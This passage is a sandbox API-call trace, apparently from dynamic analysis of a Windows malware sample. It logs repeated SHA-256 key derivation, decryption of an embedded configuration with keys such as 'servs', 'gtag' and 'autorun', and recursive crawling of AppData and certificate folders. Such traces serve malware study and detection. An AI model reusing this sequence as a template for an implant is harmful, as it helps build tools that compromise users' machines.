pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3234b0, pdwDataLen=0x12e8b8) returned 1 [0230.980] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.980] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.980] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.981] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.981] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xda0, dwFlags=0x0) returned 1 [0230.981] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.981] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3234e0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3234e0, pdwDataLen=0x12e8b8) returned 1 [0230.981] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.981] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.981] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.981] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.981] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xdc0, dwFlags=0x0) returned 1 [0230.981] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.981] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x323510, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x323510, pdwDataLen=0x12e8b8) returned 1 [0230.981] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.981] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.981] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.982] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.982] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xde0, dwFlags=0x0) returned 1 [0230.982] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.982] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x323540, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x323540, pdwDataLen=0x12e8b8) returned 1 [0230.982] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.982] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.982] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.982] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.982] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xe00, dwFlags=0x0) returned 1 [0230.982] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.982] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x323570, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x323570, pdwDataLen=0x12e8b8) returned 1 [0230.982] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.983] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.983] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.983] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.983] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xe20, dwFlags=0x0) returned 1 [0230.983] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.984] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3235a0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3235a0, pdwDataLen=0x12e8b8) returned 1 [0230.984] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.984] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.984] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.984] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.984] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xe40, dwFlags=0x0) returned 1 [0230.984] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.984] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3235d0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3235d0, pdwDataLen=0x12e8b8) returned 1 [0230.984] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.984] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.984] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.985] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.985] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xe60, dwFlags=0x0) returned 1 [0230.985] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.985] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x323600, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x323600, pdwDataLen=0x12e8b8) returned 1 [0230.985] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.985] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.985] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.985] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.985] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xe80, dwFlags=0x0) returned 1 [0230.985] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.986] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x323630, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x323630, pdwDataLen=0x12e8b8) returned 1 [0230.986] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.986] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.986] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.986] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.986] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xea0, dwFlags=0x0) returned 1 [0230.986] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.986] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x323660, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x323660, pdwDataLen=0x12e8b8) returned 1 [0230.986] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.986] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.986] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.987] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.987] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xec0, dwFlags=0x0) returned 1 [0230.987] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.987] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x323690, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x323690, pdwDataLen=0x12e8b8) returned 1 [0230.987] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.987] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.987] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.987] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.987] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xee0, dwFlags=0x0) returned 1 [0230.987] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.987] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3236c0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3236c0, pdwDataLen=0x12e8b8) returned 1 [0230.987] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.987] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.987] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.988] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.988] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xf00, dwFlags=0x0) returned 1 [0230.988] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.988] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3236f0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3236f0, pdwDataLen=0x12e8b8) returned 1 [0230.988] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.988] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.988] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.988] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.988] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xf20, dwFlags=0x0) returned 1 [0230.988] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.988] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x323720, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x323720, pdwDataLen=0x12e8b8) returned 1 [0230.988] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.989] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.989] CryptImportKey (in: hProv=0x304f30, pbData=0x12e898, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x12e888 | out: phKey=0x12e888*=0x2e4f40) returned 1 [0230.990] CryptSetKeyParam (hKey=0x2e4f40, dwParam=0x4, pbData=0x12e884*=0x1, dwFlags=0x0) returned 1 [0230.990] CryptSetKeyParam (hKey=0x2e4f40, dwParam=0x1, pbData=0x3238c0, dwFlags=0x0) returned 1 [0230.990] CryptDecrypt (in: hKey=0x2e4f40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31e420, pdwDataLen=0x12e880 | out: pbData=0x31e420, pdwDataLen=0x12e880) returned 1 [0231.000] CryptDestroyKey (hKey=0x2e4f40) returned 1 [0231.000] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0231.000] GetVersion () returned 0x1db10106 [0231.007] CharLowerBuffA (in: lpsz="mcconf", cchLength=0x6 | out: lpsz="mcconf") returned 0x6 [0231.008] CharLowerBuffA (in: lpsz="ver", cchLength=0x3 | out: lpsz="ver") returned 0x3 [0231.008] CharLowerBuffA (in: lpsz="gtag", cchLength=0x4 | out: lpsz="gtag") returned 0x4 [0231.008] CharLowerBuffA (in: lpsz="servs", cchLength=0x5 | out: lpsz="servs") returned 0x5 [0231.008] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.008] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.008] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.008] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.008] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.009] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.009] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.009] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.009] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.009] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.009] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.009] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.009] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.009] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.010] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.010] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.010] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.010] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.010] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.010] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.010] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.010] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.011] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.011] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.011] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.011] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.011] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.011] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.011] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.011] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.011] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.012] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.012] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.012] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.012] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.012] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.012] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0231.012] CharLowerBuffA (in: lpsz="autorun", cchLength=0x7 | out: lpsz="autorun") returned 0x7 [0231.012] CharLowerBuffA (in: lpsz="module", cchLength=0x6 | out: lpsz="module") returned 0x6 [0231.012] CharLowerBuffA (in: lpsz="name", cchLength=0x4 | out: lpsz="name") returned 0x4 [0231.013] CharLowerBuffA (in: lpsz="ctl", cchLength=0x3 | out: lpsz="ctl") returned 0x3 [0231.013] CharLowerBuffA (in: lpsz="module", cchLength=0x6 | out: lpsz="module") returned 0x6 [0231.013] CharLowerBuffA (in: lpsz="name", cchLength=0x4 | out: lpsz="name") returned 0x4 [0231.013] CharLowerBuffA (in: lpsz="module", cchLength=0x6 | out: lpsz="module") returned 0x6 [0231.013] CharLowerBuffA (in: lpsz="name", cchLength=0x4 | out: lpsz="name") returned 0x4 [0231.015] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x12e560 | out: pszPath="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x0 [0231.025] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\\\*", lpFindFileData=0x12da90 | out: lpFindFileData=0x12da90) returned 0x309e40 [0231.025] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0231.025] FindNextFileW (in: hFindFile=0x309e40, lpFindFileData=0x12da90 | out: lpFindFileData=0x12da90) returned 1 [0231.025] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0231.025] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0231.025] FindNextFileW (in: hFindFile=0x309e40, lpFindFileData=0x12da90 | out: lpFindFileData=0x12da90) returned 1 [0231.025] lstrcmpiW (lpString1="Microsoft", lpString2=".") returned 1 [0231.025] lstrcmpiW (lpString1="Microsoft", lpString2="..") returned 1 [0231.025] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\\\Microsoft\\\\*", lpFindFileData=0x12d000 | out: lpFindFileData=0x12d000) returned 0x309ea0 [0231.026] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0231.026] FindNextFileW (in: hFindFile=0x309ea0, lpFindFileData=0x12d000 | out: lpFindFileData=0x12d000) returned 1 [0231.026] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0231.026] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0231.026] FindNextFileW (in: hFindFile=0x309ea0, lpFindFileData=0x12d000 | out: lpFindFileData=0x12d000) returned 1 [0231.026] lstrcmpiW (lpString1="SystemCertificates", lpString2=".") returned 1 [0231.026] lstrcmpiW (lpString1="SystemCertificates", lpString2="..") returned 1 [0231.026] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\\\Microsoft\\\\SystemCertificates\\\\*", lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 0x309f00 [0231.026] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0231.026] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 1 [0231.027] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0231.027] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0231.027] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 1 [0231.027] lstrcmpiW (lpString1="My", lpString2=".") returned 1 [0231.027] lstrcmpiW (lpString1="My", lpString2="..") returned 1 [0231.027] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\\\Microsoft\\\\SystemCertificates\\\\My\\\\*", lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 0x309f60 [0231.027] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0231.027] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0231.027] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0231.027] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0231.027] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0231.027] lstrcmpiW (lpString1="Certificates", lpString2=".") returned 1 [0231.027] lstrcmpiW (lpString1="Certificates", lpString2="..") returned 1 [0231.027] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\\\Microsoft\\\\SystemCertificates\\\\My\\\\Certificates\\\\*", lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 0x309fc0 [0231.028] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0231.028] FindNextFileW (in: hFindFile=0x309fc0, lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 1 [0231.028] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0231.028] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0231.028] FindNextFileW (in: hFindFile=0x309fc0, lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 0 [0231.028] FindClose (in: hFindFile=0x309fc0 | out: hFindFile=0x309fc0) returned 1 [0231.028] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0231.028] lstrcmpiW (lpString1="CRLs", lpString2=".") returned 1 [0231.028] lstrcmpiW (lpString1="CRLs", lpString2="..") returned 1 [0231.028] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\\\Microsoft\\\\SystemCertificates\\\\My\\\\CRLs\\\\*", lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 0x309fc0 [0231.028] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0231.028] FindNextFileW (in: hFindFile=0x309fc0, lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 1 [0231.028] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0231.028] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0231.028] FindNextFileW (in: hFindFile=0x309fc0, lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 0 [0231.028] FindClose (in: hFindFile=0x309fc0 | out: hFindFile=0x309fc0) returned 1 [0231.029] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0231.029] lstrcmpiW (lpString1="CTLs", lpString2=".") returned 1 [0231.029] lstrcmpiW (lpString1="CTLs", lpString2="..") returned 1 [0231.029] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\\\Microsoft\\\\SystemCertificates\\\\My\\\\CTLs\\\\*", lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 0x309fc0 [0231.029] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0231.029] FindNextFileW (in: hFindFile=0x309fc0, lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 1 [0231.029] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0231.029] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0231.029] FindNextFileW (in: hFindFile=0x309fc0, lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 0 [0231.029] FindClose (in: hFindFile=0x309fc0 | out: hFindFile=0x309fc0) returned 1 [0231.029] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 0 [0231.029] FindClose (in: hFindFile=0x309f60 | out: hFindFile=0x309f60) returned 1 [0231.029] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 0 [0231.029] FindClose (in: hFindFile=0x309f00 | out: hFindFile=0x309f00) returned 1 [0231.029] FindNextFileW (in: hFindFile=0x309ea0, lpFindFileData=0x12d000 | out: lpFindFileData=0x12d000) returned 1 [0231.029] lstrcmpiW (lpString1="Windows", lpString2=".") returned 1 [0231.029] lstrcmpiW (lpString1="Windows", lpString2="..") returned 1 [0231.029] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\*", lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 0x309f00 [0231.030] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0231.030] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 1 [0231.030] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0231.030] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0231.030] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 1 [0231.030] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 1 [0231.030] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 0 [0231.030] FindClose (in: hFindFile=0x309f00 | out: hFindFile=0x309f00) returned 1 [0231.030] FindNextFileW (in: hFindFile=0x309ea0, lpFindFileData=0x12d000 | out: lpFindFileData=0x12d000) returned 0 [0231.030] FindClose (in: hFindFile=0x309ea0 | out: hFindFile=0x309ea0) returned 1 [0231.030] FindNextFileW (in: hFindFile=0x309e40, lpFindFileData=0x12da90 | out: lpFindFileData=0x12da90) returned 0 [0231.030] FindClose (in: hFindFile=0x309e40 | out: hFindFile=0x309e40) returned 1 [0231.030] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0xffffffffffffffff, dwFlags=0x0, pszPath=0x12e770 | out: pszPath="C:\\Users\\Default\\AppData\\Roaming") returned 0x0 [0231.211] lstrcmpiW (lpString1="C:\\Users\\Default\\AppData\\Roaming", lpString2="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned -1 [0231.211] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\*", lpFindFileData=0x12da90 | out: lpFindFileData=0x12da90) returned 0x309e40 [0231.211] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0231.211] FindNextFileW (in: hFindFile=0x309e40, lpFindFileData=0x12da90 | out: lpFindFileData=0x12da90) returned 1 [0231.211] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0231.211] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0231.211] FindNextFileW (in: hFindFile=0x309e40, lpFindFileData=0x12da90 | out: lpFindFileData=0x12da90) returned 1 